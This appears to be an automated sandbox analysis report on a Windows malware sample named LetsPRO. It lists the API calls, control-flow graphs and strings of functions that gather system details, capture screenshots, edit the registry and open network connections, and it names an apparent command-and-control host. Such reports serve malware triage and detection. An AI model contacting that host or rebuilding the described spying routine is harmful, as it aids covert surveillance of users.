InitializeCriticalSectionAndSpinCount 12168->12170 12169->12170 12171 25f5c8e 12170->12171 12172 25f5c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 12170->12172 12171->12172 12173 25f5d2b 12172->12173 12173->12140 12175 25f2dec lstrlenW WideCharToMultiByte 12174->12175 12176 25f2dd8 12174->12176 12177 25f68df 12175->12177 12176->12140 12178 25f2e12 lstrlenW WideCharToMultiByte gethostbyname 12177->12178 12179 25f2e49 12178->12179 12180 25f2e86 12179->12180 12181 25f2e50 htons connect 12179->12181 12180->12140 12181->12180 12182 25f2e9b setsockopt setsockopt setsockopt setsockopt 12181->12182 12183 25f2f14 WSAIoctl 12182->12183 12184 25f2f42 InterlockedExchange 12182->12184 12183->12184 12218 25f72fb 12184->12218 12186 25f2f69 12187 25f72fb 73 API calls 12186->12187 12188 25f2f81 12187->12188 12188->12140 12190 25f3148 12189->12190 12191 25f315e 12189->12191 12192 25f3150 InterlockedExchange 12190->12192 12193 25f1100 3 API calls 12191->12193 12192->12191 12192->12192 12194 25f317f 12193->12194 12195 25f1100 3 API calls 12194->12195 12196 25f31a6 12195->12196 12197 25f1060 3 API calls 12196->12197 12198 25f31d5 12197->12198 12354 25f3230 12198->12354 12201 25f11b0 3 API calls 12202 25f31ff GetCurrentThreadId 12201->12202 12203 25f320f WaitForSingleObject CloseHandle CloseHandle 12202->12203 12203->12140 12205 25f6fe0 12204->12205 12208 25f6f71 12204->12208 12206 25f8630 _malloc RtlDecodePointer 12205->12206 12211 25f6fca 12206->12211 12207 25f6f7c __FF_MSGBANNER __NMSG_WRITE 12207->12208 12208->12207 12209 25f6f9f RtlAllocateHeap 12208->12209 12210 25f8630 _malloc RtlDecodePointer 12208->12210 12208->12211 12209->12208 12209->12211 12210->12208 12211->12151 12213 25f8645 12212->12213 12213->12151 12215 25f6507 12214->12215 12216 25f5af2 InitializeCriticalSectionAndSpinCount 12215->12216 12217 25f6535 _free 12215->12217 12216->12161 12216->12162 12217->12216 12219 25f731f ___set_flsgetvalue __calloc_crt 12218->12219 12222 25f730b 12218->12222 12220 25f7339 __getptd 12219->12220 12221 25f7382 _free 12219->12221 12223 25f7347 12220->12223 12221->12222 12224 25f738d 12221->12224 12222->12186 12226 25f7360 CreateThread 12223->12226 12228 25f7213 12224->12228 12226->12222 12227 25f737a GetLastError 12226->12227 12233 25f7296 ___set_flsgetvalue 12226->12233 12227->12221 12231 25f7200 __getptd_noexit 12228->12231 12230 25f721e 12230->12222 12232 25f7209 12231->12232 12232->12230 12234 25f97ba 12233->12234 12235 25f72a6 ___fls_getvalue 12234->12235 12236 25f72da __freefls 12235->12236 12237 25f72b0 12235->12237 12238 25f72f5 12236->12238 12239 25f72b9 ___fls_setvalue 12237->12239 12244 25f7255 12238->12244 12241 25f72c3 GetLastError RtlExitUserThread 12239->12241 12242 25f72d0 GetCurrentThreadId 12239->12242 12241->12242 12242->12238 12243 25f72fa 12254 25f9e20 12244->12254 12246 25f7261 __getptd 12255 25f52b0 12246->12255 12263 25f2fa0 12246->12263 12269 25f30b0 12246->12269 12274 25f52d9 12246->12274 12247 25f7270 12282 25f7236 __getptd_noexit 12247->12282 12249 25f7276 __XcptFilter 12249->12243 12254->12246 12256 25f536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 12255->12256 12259 25f52cc 12255->12259 12257 25f543c 12256->12257 12258 25f53ca 12256->12258 12257->12247 12260 25f5403 OpenProcess 12258->12260 12262 25f542f Sleep 12258->12262 12259->12256 12260->12258 12261 25f5415 GetExitCodeProcess 12260->12261 12261->12258 12262->12260 12264 25f2fc3 12263->12264 12265 25f3004 select 12264->12265 12266 25f3022 recv 12264->12266 12267 25f305d 12264->12267 12294 25f3330 12264->12294 12265->12264 12265->12267 12266->12264 12267->12247 12270 25f3118 12269->12270 12273 25f30c4 12269->12273 12270->12247 12271 25f30d8 Sleep 12271->12273 12272 25f30f4 timeGetTime 12272->12273 12273->12270 12273->12271 12273->12272 12278 25f52d2 12274->12278 12275 25f536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 12276 25f543c 12275->12276 12277 25f53ca 12275->12277 12276->12247 12279 25f5403 OpenProcess 12277->12279 12281 25f542f Sleep 12277->12281 12278->12275 12279->12277 12280 25f5415 GetExitCodeProcess 12279->12280 12280->12277 12281->12279 12283 25f724b RtlExitUserThread 12282->12283 12284 25f7244 __freeptd 12282->12284 12285 25f7255 ___DllMainCRTStartup 12283->12285 12284->12283 12286 25f7261 __getptd 12285->12286 12290 25f52d9 7 API calls 12286->12290 12291 25f30b0 2 API calls 12286->12291 12292 25f2fa0 68 API calls 12286->12292 12293 25f52b0 7 API calls 12286->12293 12287 25f7270 12288 25f7236 __endthreadex 68 API calls 12287->12288 12289 25f7276 __XcptFilter 12288->12289 12289->12249 12290->12287 12291->12287 12292->12287 12293->12287 12295 25f3346 12294->12295 12308 25f1100 12295->12308 12297 25f34c1 12297->12264 12298 25f34a6 12299 25f11b0 3 API calls 12298->12299 12300 25f34b8 12299->12300 12300->12264 12301 25f33e3 timeGetTime 12315 25f11b0 12301->12315 12304 25f3358 12304->12297 12304->12298 12304->12301 12305 25f346d _memmove 12304->12305 12306 25f11b0 __floor_pentium4 VirtualAlloc VirtualFree 12304->12306 12323 25f1060 12304->12323 12327 25f54c0 12304->12327 12305->12304 12306->12304 12309 25f110b 12308->12309 12310 25f1111 __floor_pentium4 VirtualAlloc 12308->12310 12309->12304 12312 25f116f 12310->12312 12313 25f118a VirtualFree 12312->12313 12314 25f1198 12312->12314 12313->12314 12314->12304 12318 25f11bd 12315->12318 12316 25f11c6 12316->12304 12317 25f11dd __floor_pentium4 12319 25f121b VirtualAlloc 12317->12319 12320 25f1214 12317->12320 12318->12316 12318->12317 12321 25f1236 12319->12321 12320->12304 12322 25f1247 VirtualFree 12321->12322 12322->12304 12324 25f1071 12323->12324 12325 25f1100 __floor_pentium4 VirtualAlloc VirtualFree 12324->12325 12326 25f1081 12325->12326 12326->12304 12328 25f54dc 12327->12328 12349 25f580d 12327->12349 12329 25f5707 VirtualAlloc 12328->12329 12330 25f54e7 RegOpenKeyExW 12328->12330 12341 25f5745 12329->12341 12331 25f5515 RegQueryValueExW 12330->12331 12334 25f55ba 12330->12334 12332 25f55ad RegCloseKey 12331->12332 12333 25f553a 12331->12333 12332->12334 12335 25f5540 _memset RegQueryValueExW 12333->12335 12336 25f55f5 12334->12336 12348 25f56f8 12334->12348 12337 25f55aa 12335->12337 12338 25f5569 VirtualAlloc 12335->12338 12339 25f55fe VirtualFree 12336->12339 12340 25f5611 _memset _memset _memset 12336->12340 12337->12332 12342 25f55a5 12338->12342 12339->12340 12350 25f56b1 12340->12350 12344 25f5788 RegCreateKeyW 12341->12344 12341->12348 12342->12337 12343 25f72fb 57 API calls 12345 25f57f3 Sleep 12343->12345 12346 25f57ca RegCloseKey 12344->12346 12347 25f57a3 RegDeleteValueW RegSetValueExW 12344->12347 12352 25f2d00 setsockopt CancelIo InterlockedExchange closesocket SetEvent 12345->12352 12346->12348 12347->12346 12348->12343 12349->12304 12351 25f56e6 12350->12351 12353 25f3130 11 API calls 12350->12353 12351->12304 12352->12349 12353->12351 12358 25f328d 12354->12358 12359 25f324b 12354->12359 12355 25f31ef 12355->12201 12356 25f3293 send 12356->12355 12356->12358 12357 25f3252 send 12357->12359 12358->12355 12358->12356 12359->12355 12359->12357 12359->12358 14327 3f4182e 14335 3f44300 14327->14335 14329 3f4183a __lock 14330 3f41850 14329->14330 14333 3f4187a ___BuildCatchObject type_info::_Type_info_dtor 14329->14333 14332 3f3f639 _free 3 API calls 14330->14332 14334 3f41871 14330->14334 14331 3f3f639 _free 3 API calls 14331->14333 14332->14334 14334->14331 14335->14329

                                        Executed Functions

                                        Function 03F35430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440stringnetworklibraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 3f35430-3f354b7 call 3f3f707 call 3f46770 * 3 gethostname gethostbyname 9 3f354bd-3f35504 inet_ntoa call 3f403cf * 2 0->9 10 3f3555c-3f3569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 3f37490 GetSystemInfo wsprintfW call 3f36c50 call 3f36ee0 GetForegroundWindow 0->10 9->10 19 3f35506-3f35508 9->19 24 3f356b2-3f356c0 10->24 25 3f3569f-3f356ac GetWindowTextW 10->25 21 3f35510-3f3555a inet_ntoa call 3f403cf * 2 19->21 21->10 26 3f356c2 24->26 27 3f356cc-3f356f0 lstrlenW call 3f36d70 24->27 25->24 26->27 33 3f35702-3f35726 call 3f3f876 27->33 34 3f356f2-3f356ff call 3f3f876 27->34 39 3f35732-3f35756 lstrlenW call 3f36d70 33->39 40 3f35728 33->40 34->33 43 3f35768-3f357b9 GetModuleHandleW GetProcAddress 39->43 44 3f35758-3f35765 call 3f3f876 39->44 40->39 46 3f357c6-3f357cd GetSystemInfo 43->46 47 3f357bb-3f357c4 GetNativeSystemInfo 43->47 44->43 49 3f357d3-3f357e1 46->49 47->49 50 3f357e3-3f357eb 49->50 51 3f357ed-3f357f2 49->51 50->51 52 3f357f4 50->52 53 3f357f9-3f35820 wsprintfW call 3f36a70 GetCurrentProcessId 51->53 52->53 56 3f35822-3f3583c OpenProcess 53->56 57 3f35885-3f3588c call 3f36690 53->57 56->57 59 3f3583e-3f35853 GetProcessImageFileNameW 56->59 64 3f3589e-3f358ab 57->64 65 3f3588e-3f3589c 57->65 61 3f35855-3f3585c 59->61 62 3f3585e-3f3586d call 3f380f0 59->62 66 3f3587f CloseHandle 61->66 69 3f35878-3f3587e 62->69 70 3f3586f-3f35876 62->70 68 3f358ac-3f359a1 call 3f3f876 call 3f36490 call 3f36150 call 3f3fc0e GetTickCount __time64 call 3f403a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 64->68 65->68 66->57 81 3f359a3-3f359c8 68->81 82 3f359ca-3f359e9 68->82 69->66 70->66 83 3f359ea-3f35a2e call 3f35a30 call 3f33160 call 3f3efff call 3f3f00a 81->83 82->83
                                        APIs
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        • _memset.LIBCMT ref: 03F3546C
                                        • _memset.LIBCMT ref: 03F35485
                                        • _memset.LIBCMT ref: 03F35495
                                        • gethostname.WS2_32(?,00000032), ref: 03F354A3
                                        • gethostbyname.WS2_32(?), ref: 03F354AD
                                        • inet_ntoa.WS2_32 ref: 03F354C5
                                        • _strcat_s.LIBCMT ref: 03F354D8
                                        • _strcat_s.LIBCMT ref: 03F354F1
                                        • inet_ntoa.WS2_32 ref: 03F3551A
                                        • _strcat_s.LIBCMT ref: 03F3552D
                                        • _strcat_s.LIBCMT ref: 03F35546
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03F35573
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03F35587
                                        • GetLastInputInfo.USER32(?), ref: 03F3559A
                                        • GetTickCount.KERNEL32 ref: 03F355A0
                                        • wsprintfW.USER32 ref: 03F355D5
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 03F355E8
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 03F355FC
                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03F35653
                                        • wsprintfW.USER32 ref: 03F3566C
                                        • GetForegroundWindow.USER32 ref: 03F35695
                                        • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 03F356AC
                                        • lstrlenW.KERNEL32(000008CC), ref: 03F356D3
                                        • lstrlenW.KERNEL32(00000994), ref: 03F35739
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 03F357AA
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F357B1
                                        • GetNativeSystemInfo.KERNEL32(?), ref: 03F357C2
                                        • GetSystemInfo.KERNEL32(?), ref: 03F357CD
                                        • wsprintfW.USER32 ref: 03F35806
                                        • GetCurrentProcessId.KERNEL32 ref: 03F35818
                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 03F3582E
                                        • GetProcessImageFileNameW.PSAPI(00000000,?,00000104), ref: 03F3584B
                                        • CloseHandle.KERNEL32(03F55164), ref: 03F3587F
                                        • GetTickCount.KERNEL32 ref: 03F358E9
                                        • __time64.LIBCMT ref: 03F358F8
                                        • __localtime64.LIBCMT ref: 03F3592F
                                        • wsprintfW.USER32 ref: 03F35968
                                        • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 03F3597D
                                        • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 03F3598C
                                        • GetCurrentHwProfileW.ADVAPI32(?), ref: 03F35999
                                          • Part of subcall function 03F380F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75A773E0,00000AD4,00000000), ref: 03F38132
                                          • Part of subcall function 03F380F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03F38166
                                          • Part of subcall function 03F380F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03F38176
                                          • Part of subcall function 03F380F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 03F381A6
                                          • Part of subcall function 03F380F0: lstrlenW.KERNEL32(?), ref: 03F381B7
                                          • Part of subcall function 03F380F0: __wcsnicmp.LIBCMT ref: 03F381CE
                                          • Part of subcall function 03F380F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03F38204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                        • String ID: %d min$1.0$2024. 4.23$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                        • API String ID: 1101047656-2209637692
                                        • Opcode ID: 1948ce06f6f8ce57024a4bd86072b9bc2a7a239462088cb03614f5b9891fcbc4
                                        • Instruction ID: 77ae0f8f0051d5bf0e72ee8cf34f701bc0b6ae28d8e18c16180c87e99fc1842d
                                        • Opcode Fuzzy Hash: 1948ce06f6f8ce57024a4bd86072b9bc2a7a239462088cb03614f5b9891fcbc4
                                        • Instruction Fuzzy Hash: 1FF194B5940308AFD724EB64CC85FEBB7B8AF85700F004958F71EAB181EA70A645CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3DF10 Relevance: 56.4, APIs: 24, Strings: 8, Instructions: 354sleepregistrysynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 92 3f3df10-3f3df72 call 3f40542 Sleep 95 3f3df97-3f3df9d 92->95 96 3f3df74-3f3df91 call 3f3f707 call 3f3fa29 CloseHandle 92->96 98 3f3dfa4-3f3e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 3f3fa29 CloseHandle call 3f3f707 95->98 99 3f3df9f call 3f37620 95->99 96->95 108 3f3e01b-3f3e026 call 3f32c90 98->108 109 3f3e028 98->109 99->98 111 3f3e02c-3f3e046 call 3f3f707 108->111 109->111 115 3f3e054 111->115 116 3f3e048-3f3e049 call 3f39730 111->116 118 3f3e058 115->118 119 3f3e04e-3f3e052 116->119 120 3f3e063-3f3e06f call 3f3ce00 118->120 119->118 123 3f3e071-3f3e0b7 call 3f3f876 * 2 120->123 124 3f3e0b9-3f3e0fa call 3f3f876 * 2 120->124 133 3f3e100-3f3e110 123->133 124->133 134 3f3e152-3f3e15a 133->134 135 3f3e112-3f3e14c call 3f3ce00 call 3f3f876 * 2 133->135 136 3f3e162-3f3e169 134->136 137 3f3e15c-3f3e15e 134->137 135->134 139 3f3e177-3f3e17b 136->139 140 3f3e16b-3f3e175 136->140 137->136 142 3f3e181-3f3e187 139->142 140->142 144 3f3e1c6-3f3e1ee call 3f40542 call 3f32da0 142->144 145 3f3e189-3f3e1a3 EnumWindows 142->145 153 3f3e200-3f3e2ac call 3f40542 CreateEventA call 3f3f876 call 3f3ca70 144->153 154 3f3e1f0-3f3e1fb Sleep 144->154 145->144 147 3f3e1a5-3f3e1c4 Sleep EnumWindows 145->147 147->144 147->147 162 3f3e2b7-3f3e2bd 153->162 154->120 163 3f3e318-3f3e337 call 3f35430 162->163 164 3f3e2bf-3f3e2f3 Sleep RegOpenKeyExW 162->164 169 3f3e36a-3f3e370 163->169 170 3f3e339-3f3e365 CloseHandle 163->170 165 3f3e311-3f3e316 164->165 166 3f3e2f5-3f3e30b RegQueryValueExW 164->166 165->162 165->163 166->165 171 3f3e372-3f3e38e call 3f3fa29 169->171 172 3f3e390 169->172 170->120 175 3f3e394 171->175 172->175 177 3f3e396-3f3e39d 175->177 178 3f3e39f-3f3e3ae Sleep 177->178 179 3f3e40d-3f3e420 177->179 178->177 180 3f3e3b0-3f3e3b7 178->180 183 3f3e432-3f3e46c call 3f40542 Sleep CloseHandle 179->183 184 3f3e422-3f3e42c WaitForSingleObject CloseHandle 179->184 180->179 182 3f3e3b9-3f3e3cb 180->182 188 3f3e3dd-3f3e408 Sleep CloseHandle 182->188 189 3f3e3cd-3f3e3d7 WaitForSingleObject CloseHandle 182->189 183->120 184->183 188->120 189->188
                                        APIs
                                          • Part of subcall function 03F40542: __fassign.LIBCMT ref: 03F40538
                                        • Sleep.KERNEL32(00000000), ref: 03F3DF64
                                        • CloseHandle.KERNEL32(00000000), ref: 03F3DF91
                                        • GetLocalTime.KERNEL32(?), ref: 03F3DFA9
                                        • wsprintfW.USER32 ref: 03F3DFE0
                                        • SetUnhandledExceptionFilter.KERNEL32(03F375B0), ref: 03F3DFEE
                                        • CloseHandle.KERNEL32(00000000), ref: 03F3E007
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        • EnumWindows.USER32(03F35CC0,?), ref: 03F3E19D
                                        • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03F3E1AA
                                        • EnumWindows.USER32(03F35CC0,?), ref: 03F3E1BE
                                        • Sleep.KERNEL32(00000BB8), ref: 03F3E1F5
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 03F3E241
                                        • Sleep.KERNEL32(00000FA0), ref: 03F3E2C4
                                        • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 03F3E2EB
                                        • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 03F3E30B
                                        • CloseHandle.KERNEL32(?), ref: 03F3E35D
                                        • Sleep.KERNEL32(000003E8,?,?), ref: 03F3E3A4
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 03F3E3D0
                                        • CloseHandle.KERNEL32(?,?,?), ref: 03F3E3D7
                                        • Sleep.KERNEL32(000003E8,?,?), ref: 03F3E3E2
                                        • CloseHandle.KERNEL32(?), ref: 03F3E400
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 03F3E425
                                        • CloseHandle.KERNEL32(?,?,?), ref: 03F3E42C
                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 03F3E446
                                        • CloseHandle.KERNEL32(?), ref: 03F3E464
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                        • String ID: %4d.%2d.%2d-%2d:%2d:%2d$127.0.0.1$156.248.54.11.webcamcn.xyz$156.248.54.11.webcamcn.xyz$156.248.54.11.webcamcn.xyz$443$Console$IpDatespecial
                                        • API String ID: 1511462596-2209267673
                                        • Opcode ID: de6b7ebba42d86ee91fab9f1e563f052c29f55d5c41d80dc556a81056b97006c
                                        • Instruction ID: 2419456da1f8fb26c9cee3dcefb9d64c550b456dd27a8766adbd22e2401ce19a
                                        • Opcode Fuzzy Hash: de6b7ebba42d86ee91fab9f1e563f052c29f55d5c41d80dc556a81056b97006c
                                        • Instruction Fuzzy Hash: 5AD107B5988305AFE320EF60DC85E6EBBA4FFD6B04F040A2CF66586284DB709505CB53
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3BC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetDesktopWindow.USER32 ref: 03F3BC8F
                                        • GetDC.USER32(00000000), ref: 03F3BC9C
                                        • CreateCompatibleDC.GDI32(00000000), ref: 03F3BCA2
                                        • GetDC.USER32(00000000), ref: 03F3BCAD
                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 03F3BCBA
                                        • GetDeviceCaps.GDI32(00000000,00000076), ref: 03F3BCC2
                                        • ReleaseDC.USER32(00000000,00000000), ref: 03F3BCD3
                                        • GetSystemMetrics.USER32(0000004E), ref: 03F3BCF8
                                        • GetSystemMetrics.USER32(0000004F), ref: 03F3BD26
                                        • GetSystemMetrics.USER32(0000004C), ref: 03F3BD78
                                        • GetSystemMetrics.USER32(0000004D), ref: 03F3BD8D
                                        • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 03F3BDA6
                                        • SelectObject.GDI32(?,00000000), ref: 03F3BDB4
                                        • SetStretchBltMode.GDI32(?,00000003), ref: 03F3BDC0
                                        • GetSystemMetrics.USER32(0000004F), ref: 03F3BDCD
                                        • GetSystemMetrics.USER32(0000004E), ref: 03F3BDE0
                                        • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 03F3BE07
                                        • _memset.LIBCMT ref: 03F3BE7A
                                        • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 03F3BE97
                                        • _memset.LIBCMT ref: 03F3BEAF
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        • DeleteObject.GDI32(?), ref: 03F3BF23
                                        • DeleteObject.GDI32(?), ref: 03F3BF2D
                                        • ReleaseDC.USER32(00000000,?), ref: 03F3BF39
                                        • DeleteObject.GDI32(?), ref: 03F3BFDF
                                        • DeleteObject.GDI32(?), ref: 03F3BFE9
                                        • ReleaseDC.USER32(00000000,?), ref: 03F3BFF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                        • String ID: ($6$gfff$gfff
                                        • API String ID: 3293817703-713438465
                                        • Opcode ID: b820ab7de4ba1768080346f12fb633d929745d5ef34f317deef4a2a4a617f3c3
                                        • Instruction ID: 6bd6968c4692ad3e54a3bcbca91b9dc1a3fd775aacf4d150d31537af1ee61af4
                                        • Opcode Fuzzy Hash: b820ab7de4ba1768080346f12fb633d929745d5ef34f317deef4a2a4a617f3c3
                                        • Instruction Fuzzy Hash: B1D169B5E01308AFDB14EFE9EC85A9EBBB9FF49300F144529F905AB250D770A905CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F36A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcessId.KERNEL32(75A773E0), ref: 03F36A94
                                        • wsprintfW.USER32 ref: 03F36AA7
                                          • Part of subcall function 03F36910: GetCurrentProcessId.KERNEL32(1A93E2E0,00000000,00000000,75A773E0,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36938
                                          • Part of subcall function 03F36910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36947
                                          • Part of subcall function 03F36910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36960
                                          • Part of subcall function 03F36910: CloseHandle.KERNEL32(00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F3696B
                                        • _memset.LIBCMT ref: 03F36AC2
                                        • GetVersionExW.KERNEL32(?), ref: 03F36ADB
                                        • GetCurrentProcess.KERNEL32(00000008,?), ref: 03F36B12
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 03F36B19
                                        • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03F36B3F
                                        • GetLastError.KERNEL32 ref: 03F36B49
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 03F36B5D
                                        • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03F36B85
                                        • GetSidSubAuthorityCount.ADVAPI32 ref: 03F36B98
                                        • GetSidSubAuthority.ADVAPI32(00000000), ref: 03F36BA6
                                        • LocalFree.KERNEL32(?), ref: 03F36BB5
                                        • CloseHandle.KERNEL32(?), ref: 03F36BC2
                                        • wsprintfW.USER32 ref: 03F36C1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                        • String ID: -N/$NO/$None/%s
                                        • API String ID: 3036438616-3095023699
                                        • Opcode ID: 831b57fd5e6fc478bd755c93e32380c5e8e101dcf1f5261105576cdc25afd39d
                                        • Instruction ID: 4cfa1fdd2b59562aa0a7ee18a6dab1f1a45d8ce737b0f6d6ab858beb6c66737a
                                        • Opcode Fuzzy Hash: 831b57fd5e6fc478bd755c93e32380c5e8e101dcf1f5261105576cdc25afd39d
                                        • Instruction Fuzzy Hash: 0641A071A00319BFDB20DB61DCD8FEA7B78EB0A711F044595FA0AD6245DA34D990CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F36150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222stringcomregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 569 3f36150-3f361a5 call 3f46770 call 3f4004b 574 3f36201-3f36228 CoCreateInstance 569->574 575 3f361a7-3f361ae 569->575 576 3f36422-3f3642f lstrlenW 574->576 577 3f3622e-3f36282 574->577 578 3f361b0-3f361b2 call 3f36050 575->578 579 3f36441-3f36450 576->579 580 3f36431-3f3643b lstrcatW 576->580 587 3f3640a-3f36418 577->587 588 3f36288-3f362a2 577->588 585 3f361b7-3f361b9 578->585 583 3f36452-3f36457 579->583 584 3f3645a-3f3647a call 3f3f00a 579->584 580->579 583->584 589 3f361db-3f361ff call 3f4004b 585->589 590 3f361bb-3f361d9 lstrcatW * 2 585->590 587->576 593 3f3641a-3f3641f 587->593 588->587 596 3f362a8-3f362b4 588->596 589->574 589->578 590->589 593->576 597 3f362c0-3f36363 call 3f46770 wsprintfW RegOpenKeyExW 596->597 600 3f363e9-3f363ff 597->600 601 3f36369-3f363ba call 3f46770 RegQueryValueExW 597->601 604 3f36402-3f36404 600->604 605 3f363dc-3f363e3 RegCloseKey 601->605 606 3f363bc-3f363da lstrcatW * 2 601->606 604->587 604->597 605->600 606->605
                                        APIs
                                        • _memset.LIBCMT ref: 03F3618B
                                        • lstrcatW.KERNEL32(03F61F10,03F5510C), ref: 03F361CD
                                        • lstrcatW.KERNEL32(03F61F10,03F5535C), ref: 03F361D9
                                        • CoCreateInstance.OLE32(03F52480,00000000,00000017,03F5578C,?,?,1A93E2E0,00000AD4,00000000,75A773E0), ref: 03F36220
                                        • _memset.LIBCMT ref: 03F362CE
                                        • wsprintfW.USER32 ref: 03F36336
                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 03F3635F
                                        • _memset.LIBCMT ref: 03F36376
                                          • Part of subcall function 03F36050: _memset.LIBCMT ref: 03F3607C
